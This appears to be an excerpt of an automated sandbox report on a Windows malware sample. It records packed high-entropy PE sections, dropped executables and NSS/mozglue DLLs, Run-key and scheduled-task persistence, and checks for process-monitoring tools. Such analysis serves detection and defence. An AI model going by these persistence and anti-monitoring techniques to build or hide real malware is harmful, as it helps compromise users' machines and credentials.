                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C963480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime,0_2_6C963480
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                      Source: fb696bafb5.exe.22.drStatic PE information: real checksum: 0x2a14f4 should be: 0x2a5157
                      Source: random[1].exe.0.drStatic PE information: real checksum: 0x1eab5e should be: 0x1e855d
                      Source: random[2].exe0.22.drStatic PE information: real checksum: 0x2a14f4 should be: 0x2a5157
                      Source: random[1].exe0.22.drStatic PE information: real checksum: 0x1d3a88 should be: 0x1ce4fd
                      Source: random[2].exe.22.drStatic PE information: real checksum: 0x1be93a should be: 0x1bb41e
                      Source: 824db60d2b.exe.22.drStatic PE information: real checksum: 0x43b8c5 should be: 0x43aa64
                      Source: DocumentsKJEGCFBGDH.exe.0.drStatic PE information: real checksum: 0x1eab5e should be: 0x1e855d
                      Source: random[1].exe.22.drStatic PE information: real checksum: 0x43b8c5 should be: 0x43aa64
                      Source: 8eeb449c35.exe.22.drStatic PE information: real checksum: 0x1d3a88 should be: 0x1ce4fd
                      Source: 241fdb96f6.exe.22.drStatic PE information: real checksum: 0x1be93a should be: 0x1bb41e
                      Source: file.exeStatic PE information: real checksum: 0x1be93a should be: 0x1bb41e
                      Source: skotes.exe.21.drStatic PE information: real checksum: 0x1eab5e should be: 0x1e855d
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name: .idata
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name: riuyamyn
                      Source: file.exeStatic PE information: section name: ezwcdmtt
                      Source: file.exeStatic PE information: section name: .taggant
                      Source: softokn3[1].dll.0.drStatic PE information: section name: .00cfg
                      Source: freebl3.dll.0.drStatic PE information: section name: .00cfg
                      Source: freebl3[1].dll.0.drStatic PE information: section name: .00cfg
                      Source: random[1].exe.0.drStatic PE information: section name:
                      Source: random[1].exe.0.drStatic PE information: section name: .idata
                      Source: random[1].exe.0.drStatic PE information: section name:
                      Source: random[1].exe.0.drStatic PE information: section name: hicendxx
                      Source: random[1].exe.0.drStatic PE information: section name: qvwfrqsg
                      Source: random[1].exe.0.drStatic PE information: section name: .taggant
                      Source: DocumentsKJEGCFBGDH.exe.0.drStatic PE information: section name:
                      Source: DocumentsKJEGCFBGDH.exe.0.drStatic PE information: section name: .idata
                      Source: DocumentsKJEGCFBGDH.exe.0.drStatic PE information: section name:
                      Source: DocumentsKJEGCFBGDH.exe.0.drStatic PE information: section name: hicendxx
                      Source: DocumentsKJEGCFBGDH.exe.0.drStatic PE information: section name: qvwfrqsg
                      Source: DocumentsKJEGCFBGDH.exe.0.drStatic PE information: section name: .taggant
                      Source: mozglue.dll.0.drStatic PE information: section name: .00cfg
                      Source: mozglue[1].dll.0.drStatic PE information: section name: .00cfg
                      Source: msvcp140.dll.0.drStatic PE information: section name: .didat
                      Source: msvcp140[1].dll.0.drStatic PE information: section name: .didat
                      Source: nss3.dll.0.drStatic PE information: section name: .00cfg
                      Source: nss3[1].dll.0.drStatic PE information: section name: .00cfg
                      Source: softokn3.dll.0.drStatic PE information: section name: .00cfg
                      Source: skotes.exe.21.drStatic PE information: section name:
                      Source: skotes.exe.21.drStatic PE information: section name: .idata
                      Source: skotes.exe.21.drStatic PE information: section name:
                      Source: skotes.exe.21.drStatic PE information: section name: hicendxx
                      Source: skotes.exe.21.drStatic PE information: section name: qvwfrqsg
                      Source: skotes.exe.21.drStatic PE information: section name: .taggant
                      Source: random[1].exe.22.drStatic PE information: section name:
                      Source: random[1].exe.22.drStatic PE information: section name: .rsrc
                      Source: random[1].exe.22.drStatic PE information: section name: .idata
                      Source: random[1].exe.22.drStatic PE information: section name:
                      Source: random[1].exe.22.drStatic PE information: section name: rvygeofs
                      Source: random[1].exe.22.drStatic PE information: section name: echvckmy
                      Source: random[1].exe.22.drStatic PE information: section name: .taggant
                      Source: 824db60d2b.exe.22.drStatic PE information: section name:
                      Source: 824db60d2b.exe.22.drStatic PE information: section name: .rsrc
                      Source: 824db60d2b.exe.22.drStatic PE information: section name: .idata
                      Source: 824db60d2b.exe.22.drStatic PE information: section name:
                      Source: 824db60d2b.exe.22.drStatic PE information: section name: rvygeofs
                      Source: 824db60d2b.exe.22.drStatic PE information: section name: echvckmy
                      Source: 824db60d2b.exe.22.drStatic PE information: section name: .taggant
                      Source: random[1].exe0.22.drStatic PE information: section name:
                      Source: random[1].exe0.22.drStatic PE information: section name: .rsrc
                      Source: random[1].exe0.22.drStatic PE information: section name: .idata
                      Source: random[1].exe0.22.drStatic PE information: section name:
                      Source: random[1].exe0.22.drStatic PE information: section name: hcvjgapr
                      Source: random[1].exe0.22.drStatic PE information: section name: xbrvldyi
                      Source: random[1].exe0.22.drStatic PE information: section name: .taggant
                      Source: 8eeb449c35.exe.22.drStatic PE information: section name:
                      Source: 8eeb449c35.exe.22.drStatic PE information: section name: .rsrc
                      Source: 8eeb449c35.exe.22.drStatic PE information: section name: .idata
                      Source: 8eeb449c35.exe.22.drStatic PE information: section name:
                      Source: 8eeb449c35.exe.22.drStatic PE information: section name: hcvjgapr
                      Source: 8eeb449c35.exe.22.drStatic PE information: section name: xbrvldyi
                      Source: 8eeb449c35.exe.22.drStatic PE information: section name: .taggant
                      Source: random[2].exe.22.drStatic PE information: section name:
                      Source: random[2].exe.22.drStatic PE information: section name: .idata
                      Source: random[2].exe.22.drStatic PE information: section name:
                      Source: random[2].exe.22.drStatic PE information: section name: riuyamyn
                      Source: random[2].exe.22.drStatic PE information: section name: ezwcdmtt
                      Source: random[2].exe.22.drStatic PE information: section name: .taggant
                      Source: 241fdb96f6.exe.22.drStatic PE information: section name:
                      Source: 241fdb96f6.exe.22.drStatic PE information: section name: .idata
                      Source: 241fdb96f6.exe.22.drStatic PE information: section name:
                      Source: 241fdb96f6.exe.22.drStatic PE information: section name: riuyamyn
                      Source: 241fdb96f6.exe.22.drStatic PE information: section name: ezwcdmtt
                      Source: 241fdb96f6.exe.22.drStatic PE information: section name: .taggant
                      Source: random[2].exe0.22.drStatic PE information: section name:
                      Source: random[2].exe0.22.drStatic PE information: section name: .idata
                      Source: random[2].exe0.22.drStatic PE information: section name: yggyennp
                      Source: random[2].exe0.22.drStatic PE information: section name: ceftresi
                      Source: random[2].exe0.22.drStatic PE information: section name: .taggant
                      Source: fb696bafb5.exe.22.drStatic PE information: section name:
                      Source: fb696bafb5.exe.22.drStatic PE information: section name: .idata
                      Source: fb696bafb5.exe.22.drStatic PE information: section name: yggyennp
                      Source: fb696bafb5.exe.22.drStatic PE information: section name: ceftresi
                      Source: fb696bafb5.exe.22.drStatic PE information: section name: .taggant
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C99B536 push ecx; ret 0_2_6C99B549
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_05312C32 push ebp; ret 25_3_05312C33
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_05312C32 push ebp; ret 25_3_05312C33
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_05312C32 push ebp; ret 25_3_05312C33
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_05312C1A push edx; ret 25_3_05312C1B
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_05312C1A push edx; ret 25_3_05312C1B
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_05312C1A push edx; ret 25_3_05312C1B
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_0530F6C3 pushad ; retf 25_3_0530F6D0
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_0530F6C3 pushad ; retf 25_3_0530F6D0
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DDFEC7 push esp; iretd 25_3_00DDFEC8
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DDFEC7 push esp; iretd 25_3_00DDFEC8
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DE2680 push ebp; ret 25_3_00DE268B
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DE2680 push ebp; ret 25_3_00DE268B
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DE2680 push ebp; ret 25_3_00DE268B
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DE06AA push ebx; ret 25_3_00DE06AB
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DE06AA push ebx; ret 25_3_00DE06AB
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DE06AA push ebx; ret 25_3_00DE06AB
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DD8851 push FFFFFFEAh; ret 25_3_00DD8853
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DD8851 push FFFFFFEAh; ret 25_3_00DD8853
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DE184A pushfd ; ret 25_3_00DE184B
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DE184A pushfd ; ret 25_3_00DE184B
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DE184A pushfd ; ret 25_3_00DE184B
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DDB3D5 push ebx; ret 25_3_00DDB3E3
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DDB3D5 push ebx; ret 25_3_00DDB3E3
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DDB3C0 push edi; ret 25_3_00DDB3C3
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DDB3C0 push edi; ret 25_3_00DDB3C3
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DD8F85 push esi; ret 25_3_00DD8F86
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DD8F85 push esi; ret 25_3_00DD8F86
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DDB3B0 push ebp; ret 25_3_00DDB3B3
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DDB3B0 push ebp; ret 25_3_00DDB3B3
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeCode function: 25_3_00DDB355 push ebx; ret 25_3_00DDB3E3
                      Source: file.exeStatic PE information: section name: riuyamyn entropy: 7.954113428068828
                      Source: random[1].exe.0.drStatic PE information: section name: entropy: 7.986679313934327
                      Source: random[1].exe.0.drStatic PE information: section name: hicendxx entropy: 7.954387738095782
                      Source: DocumentsKJEGCFBGDH.exe.0.drStatic PE information: section name: entropy: 7.986679313934327
                      Source: DocumentsKJEGCFBGDH.exe.0.drStatic PE information: section name: hicendxx entropy: 7.954387738095782
                      Source: skotes.exe.21.drStatic PE information: section name: entropy: 7.986679313934327
                      Source: skotes.exe.21.drStatic PE information: section name: hicendxx entropy: 7.954387738095782
                      Source: random[1].exe.22.drStatic PE information: section name: rvygeofs entropy: 7.9566962059376065
                      Source: 824db60d2b.exe.22.drStatic PE information: section name: rvygeofs entropy: 7.9566962059376065
                      Source: random[1].exe0.22.drStatic PE information: section name: entropy: 7.979806928736388
                      Source: random[1].exe0.22.drStatic PE information: section name: hcvjgapr entropy: 7.954111183575333
                      Source: 8eeb449c35.exe.22.drStatic PE information: section name: entropy: 7.979806928736388
                      Source: 8eeb449c35.exe.22.drStatic PE information: section name: hcvjgapr entropy: 7.954111183575333
                      Source: random[2].exe.22.drStatic PE information: section name: riuyamyn entropy: 7.954113428068828
                      Source: 241fdb96f6.exe.22.drStatic PE information: section name: riuyamyn entropy: 7.954113428068828
                      Source: random[2].exe0.22.drStatic PE information: section name: entropy: 7.803155763198789
                      Source: fb696bafb5.exe.22.drStatic PE information: section name: entropy: 7.803155763198789

                      Persistence and Installation Behavior

                      barindex
                      Drops PE files to the document folder of the user
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\DocumentsKJEGCFBGDH.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dllJump to dropped file
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\DocumentsKJEGCFBGDH.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\DocumentsKJEGCFBGDH.exeJump to dropped file

                      Boot Survival

                      barindex
                      Creates multiple autostart registry keys
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fb696bafb5.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8eeb449c35.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 241fdb96f6.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 846d486827.exe
                      Drops PE files to the user root directory
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\DocumentsKJEGCFBGDH.exeJump to dropped file
                      Monitors registry run keys for changes
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                      Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeWindow searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeWindow searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeWindow searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeFile created: C:\Windows\Tasks\skotes.job
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8eeb449c35.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8eeb449c35.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 241fdb96f6.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 241fdb96f6.exe
